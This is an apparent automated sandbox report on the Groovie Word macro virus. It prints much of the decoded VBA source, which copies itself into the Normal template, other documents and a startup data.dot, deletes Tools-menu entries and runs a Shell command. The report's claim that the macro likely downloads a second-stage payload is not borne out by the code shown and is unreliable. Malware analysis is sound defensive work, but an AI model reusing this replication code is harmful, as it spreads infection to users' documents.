Verdict: MALICIOUS
Risk Score: 360
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains critical heuristics for VBA macros, including the use of the Shell() function and AutoOpen/Auto_Close macros, indicating malicious intent. The ClamAV detections 'Doc.Trojan.Groovie-2' and 'Doc.Trojan.Groov-1' further confirm its malicious nature. The VBA script, named 'groovie', likely attempts to download and execute a second-stage payload, a common tactic for this type of malware.
Heuristics (7)
- ClamAV: Doc.Trojan.Groovie-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Groovie-2
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27311 bytes |

SHA-256: 129c46bba9b9cee52320705ced7d283252cbf50cf25361445db7c896f2f55f9f
Detection (ClamAV): Doc.Trojan.Groov-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "CyberHack"
Attribute VB_Name = "CyberForm"
Attribute VB_Base = "0{B61A25EC-3E02-11D3-ADEF-008048EF8E4D}{B61A25E0-3E02-11D3-ADEF-008048EF8E4D}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Unload Me
End Sub
Attribute VB_Name = "groovie"
Public WhoAmI As String
Public DataDot As Boolean
Public NormInstalled As Boolean
Public DocInstalled As Boolean
Public NormReadOnly As Boolean
Public HoldDoc As String
Public DocThere As Boolean
Public Final_Close_Called As Boolean
Public rn As Variant
Function ID_Status()
On Error Resume Next
If MacroContainer = NormalTemplate Then
WhoAmI = "normal"
GoTo checkout
End If
If MacroContainer = ActiveDocument Then WhoAmI = "document"
If MacroContainer = "data.dot" Then WhoAmI = "orbit"
checkout:
End Function
Function Install_Status()
Dim i As Variant
On Error Resume Next
If Dir(Application.StartupPath + "\data.dot") = "data.dot" Then DataDot = True
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "groovie" Then DocInstalled = True
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "groovie" Then NormInstalled = True
Next i
If GetAttr(NormalTemplate.FullName) = vbArchive + vbReadOnly Or _
GetAttr(NormalTemplate.FullName) = vbReadOnly Then NormReadOnly = True
End Function
Function The_Groovie_Core()
On Error Resume Next
Call ID_Status
Call Install_Status
If WhoAmI = "document" Then Call DocCodeCore
If WhoAmI = "normal" Then Call NormCodeCore
If WhoAmI = "orbit" Then Call OrbitCoreCode
If NormReadOnly = False Then CommandBars("tools").Controls("Macro").Delete
If NormReadOnly = False Then CommandBars("tools").Controls("Templates and add-ins...").Delete
End Function
Function DocCodeCore()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("groovie").Export "c:\groovie.sys"
If NormInstalled = False And NormReadOnly = False Then
With NormalTemplate.VBProject
With .VBComponents.Import("c:\groovie.sys")
End With
End With
End If
If DataDot = False Then
ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
Application.OrganizerRename Source:=Application.StartupPath + "\data.dot", Name:="groovie", NewName:="orbit", Object:=wdOrganizerObjectProjectItems
ActiveDocument.SaveAs FileName:=Application.StartupPath + "\data.dot", _
FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Final_Close_Called = False Then Documents.Open FileName:=HoldDoc
Shell ("label c: groovie"), 0
Windows(1).Close
End If
End Function
Function NormCodeCore()
On Error Resume Next
Application.ScreenUpdating = False
Call Check_For_Doc
If DocInstalled = False And DocThere = True Then
With ActiveDocument.VBProject
With .VBComponents.Import("c:\groovie.sys")
End With
End With
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "ALT-F11 says it's groovie!"
.Execute
End With
End If
If Data
... (truncated)